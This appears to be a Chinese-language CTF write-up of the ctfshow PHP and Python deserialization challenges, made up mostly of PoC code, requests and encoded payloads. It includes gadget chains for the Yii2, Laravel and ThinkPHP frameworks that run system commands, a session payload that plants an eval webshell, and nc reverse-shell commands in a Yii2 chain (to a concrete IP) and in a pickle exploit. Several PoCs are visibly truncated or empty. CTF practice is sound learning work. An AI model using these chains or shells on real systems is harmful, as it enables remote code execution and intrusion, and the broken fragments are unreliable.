ctfshow-反序列化
WEB-254
就是看懂代码就可以了,和反序列化没关系,让条件成立就给flag了
paylaod:?username=xxxxxx&password=xxxxxx
WEB-255
通过cookie传参反序列化达到$isVip=true;即可
poc:
1
2
3
4
5
6
7
8
9
| <?php
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=true;}
$a = new ctfShowUser();
echo urlencode(serialize($a));
?>
|
然后请求如下:
1
2
3
4
5
6
7
8
9
10
11
12
| GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host: b1e5d003-80d4-4a98-b405-4ce5b5c72282.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*
|
WEB-256
在上一题基础上使得username与password不相等 通过反序列化实现即可
poc: 这里最好不要将值设为数字会打不通的
1
2
3
4
5
6
7
8
| class ctfShowUser{
public $username='a';
public $password='xxxxxx';
public $isVip=true;}
$a = new ctfShowUser();
echo urlencode(serialize($a));
?>
|
请求包如下:
1
2
3
4
5
6
7
8
9
10
11
| GET /?username=a&password=xxxxxx HTTP/1.1
Host: d4976ed7-1dae-4590-a624-a16d69c89609.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*
|
WEB-257
思路:ctfShowUser类的__destruct()->backDoor的getInfo()
利用构造函数进行覆盖就行了
poc如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <?php
class ctfShowUser{
public $username='a';
public $password='xxxxxx';
public $isVip=true;
private $class;
public function __construct(){
$this->class=new backDoor();
}
}
class info{
private $user='xxxxxx';
}
class backDoor{
private $code='system("cat flag.php");';
}
$a = new ctfShowUser();
echo urlencode(serialize($a));
?>
|
请求包:
1
2
3
4
5
6
7
8
9
10
11
12
| GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host: 7aa30d0e-43ad-4b97-85fe-c4c15056de6d.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*
|
WEB-258
多了一个正则匹配条件:!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])
就是不能存在o:数字的形式
因为我们序列化对象后会出现这种情况
所以我只需要在:之后加上+即可 因为浏览器解析会把我们的加号解析为空格 就可以bypass了
poc和上到题目一样 就是自己手动添加两个+即可
1
| O:+11:"ctfShowUser":4:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"isVip";b:1;s:5:"class";O:+8:"backDoor":1:{s:4:"code";s:23:"system("cat flag.php");";}}
|
提交的时候再url编码一下不然会出现歧义
WEB-259(SoapClient)
SoapClient采用HTTP作为底层通讯协议,XML作为数据传送的格式。
这道题目本质我看了一下wp 利用SoapClient的__call魔术方法
因为我们用SoapClient生成的对象不存在getFlag()方法,所以就会自动调用__call魔术方法
默认$func为不存在函数名 $args为参数 并且以数组形式
这道题目最大问题就是没法直接通过访问/flag修改其xff为127.0.0.1来达到条件
所以就需要这个内置类配合crlf来模拟一个请求包 来达到将flag存入flag.txt的条件
我的理解是这样
参考:https://www.xiinnn.com/article/7741c455.html 讲的很仔细
poc(偷的人家的):
1
2
3
4
| <?php
?>';
echo urlencode(serialize($a))
?>
|
WEB-262,264(反序列化字符串逃逸)
看到有序列化后字符替换 一眼丁真就是字符串逃逸
这道题目其实会将我们提交的内容先序列化然后再反序列化
简单demo看懂
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| <?php
class message{
public $from=1;
public $msg=1;
public $to='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
public $token='user';
}
$a = new message();
$b = serialize($a);
echo $b;
echo "\n";
print_r(unserialize(str_replace('fuck', 'loveU', $b)))
?>
|
payload:?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck%22%3Bs%3A5%3A%22token%22%3Bs%3A5%3A%22admin%22%3B%7D
然后将cookie保存下来 访问/message 打入cookie即可获得flag
WEB-263(phpsession序列化)
访问/www.zip源码泄露
这道题目一开始最大的疑惑是是我们提交上去的序列化内容在哪反序列化的
网上wp千篇一律没人提及
最后我也没弄明白 感觉只有这个session引擎会 所以我也就这么理解了
先来看:ini_set('session.serialize_handler', 'php');参考:https://blog.spoock.com/2016/10/16/php-serialize-problem/
session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。
- php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
- php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
- php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值
然后简单的逻辑就是我们可以通过控制session去序列化
在inc.php有
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function setStatus($s){
$this->status=$s;
}
function __destruct(){
file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
}
}
|
他的析构函数就是我们的插入点
因为这个题目是默认的引擎 所以session是用|来分割键值 值为serialize()处理的结果
poc如下:
1
2
3
4
5
| <?php
?>';
echo base64_encode('|'.serialize($a))
#fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNToiPD9waHAgQGV2YWwoJF9QT1NUW3hdKTs/PiI7czo2OiJzdGF0dXMiO047fQ==
?>
|
访问index.php cookie[limit]打入 再访问check.php
然后访问我们的木马文件 log-1.php
rce即可
WEB-265(取地址符)
这道题目一开始看 发现这个随机数函数绕过不去 看了wp 师傅们太强了
用了&取地址 $a=&$b则当b值变 a也跟着变
poc:
1
2
3
4
5
6
7
8
9
10
11
12
| <?php
class ctfshowAdmin{
public $token;
public $password;
public function __construct(){
$this->token='a';
$this->password =&$this->token;
}}
$a=new ctfshowAdmin();
echo urlencode(serialize($a));
?>
|
WEB-266
这道题目大写绕个正则即可
1
2
3
4
5
6
7
8
9
10
11
12
13
| GET / HTTP/1.1
Host: 0df5fa90-8128-463c-b40b-12ed31c48ad8.challenge.ctf.show
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*
|
WEB-267(Yii2反序列化链)
yii2是php的一个框架 直接在网上找现成的链子poc即可
首先通过弱口令 admin/admin登录 然后查看about
提示访问?r=site%2Fabout&view-source
然后这里查看源码可以发现yii2这个信息 因为是反序列化模块嘛直接去找链子即可
这道题找到的poc只能用passthru函数 其他函数都用不了 挺奇怪的
poc如下: 参考:https://www.anquanke.com/post/id/254429 这里的链子哪个不行换就行了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?php
namespace yii\rest {
class CreateAction {
public $id;
public $checkAccess;
public function __construct() {
$this->id = 'cat /flag';
$this->checkAccess = 'passthru';
}
}
}
namespace Faker {
use yii\rest\CreateAction;
class Generator {
protected $formatters;
public function __construct() {
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yii\db {
use Faker\Generator;
class BatchQueryResult {
private $_dataReader;
public function __construct() {
$this->_dataReader = new Generator();
}
}
}
namespace {
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
?>
|
paylaod:
1
| ?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoyOiJpZCI7czo5OiJjYXQgL2ZsYWciO3M6MTE6ImNoZWNrQWNjZXNzIjtzOjg6InBhc3N0aHJ1Ijt9aToxO3M6MzoicnVuIjt9fX19
|
WEB-268(Yii2反序列化链)
前面的链子不行了 换一个就行了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| <?php
namespace yii\rest {
class CreateAction {
public $checkAccess;
public $id;
public function __construct() {
$this->checkAccess="passthru";
$this->id="cat /flags";
}
}
}
namespace Faker {
use yii\rest\CreateAction;
class Generator {
protected $formatters;
public function __construct() {
$this->formatters['isRunning'] = [new CreateAction(), 'run'];
}
}
}
namespace Codeception\Extension {
use Faker\Generator;
class RunProcess {
private $processes;
public function __construct() {
$this->processes = [new Generator()];
}
}
}
namespace {
use Codeception\Extension\RunProcess;
echo base64_encode(serialize(new RunProcess()));
}
?>
|
WEB-269(Yii2反序列化链)
继续换:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| <?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'passthru';
$this->id = 'cat /flagsa';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['render'] = [new CreateAction(), 'run'];
}
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
class See{
protected $description;
public function __construct()
{
$this->description = new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
class Swift_KeyCache_DiskKeyCache{
private $keys = [];
private $path;
public function __construct()
{
$this->path = new See;
$this->keys = array(
"axin"=>array("is"=>"handsome")
);
}
}
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
|
WEB-270(Yii2反序列化链)
这次用反弹shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| <?php
namespace yii\rest {
class Action
{
public $checkAccess;
}
class IndexAction
{
public function __construct($func, $param)
{
$this->checkAccess = $func;
$this->id = $param;
}
}
}
namespace yii\web {
abstract class MultiFieldSession
{
public $writeCallback;
}
class DbSession extends MultiFieldSession
{
public function __construct($func, $param)
{
$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
}
}
}
namespace yii\db {
use yii\base\BaseObject;
class BatchQueryResult
{
private $_dataReader;
public function __construct($func, $param)
{
$this->_dataReader = new \yii\web\DbSession($func, $param);
}
}
}
namespace {
$exp = new \yii\db\BatchQueryResult('shell_exec', 'nc 8.130.34.53 7777 -e /bin/sh');
echo(base64_encode(serialize($exp)));
}
?>
|
WEB-271(Laravel5.7反序列化)
直接网上嫖利用链就行了
参考:https://xz.aliyun.com/t/10578#toc-3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| <?php
namespace Illuminate\Foundation\Testing {
class PendingCommand
{
protected $command;
protected $parameters;
public $test;
protected $app;
public function __construct($test, $app, $command, $parameters)
{
$this->app = $app;
$this->test = $test;
$this->command = $command;
$this->parameters = $parameters;
}
}
}
namespace Faker {
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace Illuminate\Foundation {
class Application
{
protected $instances = [];
public function __construct($instances = [])
{
$this->instances['Illuminate\Contracts\Console\Kernel'] = $instances;
}
}
}
namespace {
$defaultgenerator = new Faker\DefaultGenerator(array("DawnT0wn" => "1"));
$app = new Illuminate\Foundation\Application();
$application = new Illuminate\Foundation\Application($app);
$pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator, $application, "system", array("cat /flag"));
echo urlencode(serialize($pendingcommand));
}
?>
|
post:data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Ba%3A1%3A%7Bs%3A8%3A%22DawnT0wn%22%3Bs%3A1%3A%221%22%3B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A12%3A%22%00%2A%00instances%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A12%3A%22%00%2A%00instances%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A0%3A%7B%7D%7D%7D%7D%7D%7D
WEB-272~273(Laravel5.8反序列化)
poc如下 参考https://blog.csdn.net/qq_61991235/article/details/123583489?ydreferer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8%3D
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
| <?php
namespace Illuminate\Broadcasting{
use Illuminate\Bus\Dispatcher;
use Illuminate\Foundation\Console\QueuedCommand;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct(){
$this->events=new Dispatcher();
$this->event=new QueuedCommand();
}
}
}
namespace Illuminate\Foundation\Console{
use Mockery\Generator\MockDefinition;
class QueuedCommand
{
public $connection;
public function __construct()
{
$this->connection=new MockDefinition();
}
}
}
namespace Mockery\Generator{
class MockDefinition{
protected $config;
protected $code;
public function __construct()
{
$this->code="<?php echo system('cat /flag'); exit(); ?>";
$this->config=new MockConfiguration();
}
}
class MockConfiguration{
}
}
namespace Illuminate\Bus{
use Mockery\Loader\EvalLoader;
class Dispatcher
{
protected $queueResolver;
public function __construct()
{
$this->queueResolver=[new EvalLoader(),'load'];
}
}
}
namespace Mockery\Loader{
class EvalLoader{
}
}
namespace{
use Illuminate\Broadcasting\PendingBroadcast;
echo urlencode(serialize(new PendingBroadcast()));
}
?>
|
post:data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22Mockery%5CLoader%5CEvalLoader%22%3A0%3A%7B%7Di%3A1%3Bs%3A4%3A%22load%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3BO%3A32%3A%22Mockery%5CGenerator%5CMockDefinition%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A35%3A%22Mockery%5CGenerator%5CMockConfiguration%22%3A0%3A%7B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A42%3A%22%3C%3Fphp+echo+system%28%27cat+%2Fflag%27%29%3B+exit%28%29%3B+%3F%3E%22%3B%7D%7D%7D
WEB-274(thinkPHP5.1反序列化)
看到界面就很熟悉一眼丁真是thinkphp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| <?php
namespace think;
abstract class Model{
protected $append = [];
private $data = [];
function __construct(){
$this->append = ["ethan"=>["dir","calc"]];
$this->data = ["ethan"=>new Request()];
}
}
class Request
{
protected $hook = [];
protected $filter = "system";
protected $config = [
'var_method' => '_method',
'var_ajax' => '_ajax',
'var_pjax' => '_pjax',
'var_pathinfo' => 's',
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
'default_filter' => '',
'url_domain_root' => '',
'https_agent_name' => '',
'http_agent_ip' => 'HTTP_X_REAL_IP',
'url_html_suffix' => 'html',
];
function __construct(){
$this->filter = "system";
$this->config = ["var_ajax"=>''];
$this->hook = ["visible"=>[$this,"isAjax"]];
}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
private $files = [];
public function __construct()
{
$this->files=[new Pivot()];
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>
|
payload:
1
| ?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&shell=cat /flag
|
WEB-275
这道题有个逻辑错误 一开始我还以为关键在于copy($_GET['fn'],md5(mt_rand()).'.txt');
这道题目问题是将我们木马文件赋值到一个随机文件中 然后把我们的文件删了
本来想是在他删除我们文件之前利用重定向 将flag读到别的文件中 之后发现不行 没有权限好像
看了眼wp 返现纯纯的逻辑问题 直接利用析构函数里的system 拼接命令即可
payload:
WEB-276(phar反序列化)
首先这道题目增加了一个admin 想进入析构函数执行system则必须修改这个admin
那么就需要进行反序列化 但是题目并没有给我们反序列化的函数
然后看了wp就是通过phar来进行的
首先上传一个文件然后内容是phar生成的内容(包含我们的恶意序列化内容) 这是一个固定格式 我之前总结过这里就不赘述了
但是一开始我最大的问题 我们上传的文件需要配合phar://协议 然后我们的恶意内容才会进行反序列化
在哪里利用phar://呢 然后又检索了一番 原来是我们上传上去之后 脚本源码是通过unlink函数进行删除我们上传的文件的 刚好这个unlink函数就可以配合phar://协议将我们的恶意内容反序列化
因此这里需要条件竞争 一个包一直发上传phar序列化内容的包 另一个包一直发phar://协议访问我们上传文件的包
但是不知道是我哪里不对,还是题目环境问题,不管是自己发包还是别人的poc,我一直没成功,不过明白怎么做就ok了,思路最重要。
然后受影响的函数有这些
偷的:https://paper.seebug.org/680/
WEB-277 288(python)
常规反序列化
查看源码#--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m)
EXP如下:
1
2
3
4
5
6
7
8
9
| import base64
import pickle
class EXP():
def __reduce__(self):
return(eval, ("__import__('os').popen('nc ip 7777 -e /bin/sh')",))
exp = EXP()
a = pickle.dumps(exp)
print(base64.b64encode(a))
|
尾巴:
至此 即将进军java模块 当然准备开始学习java!冲就完了
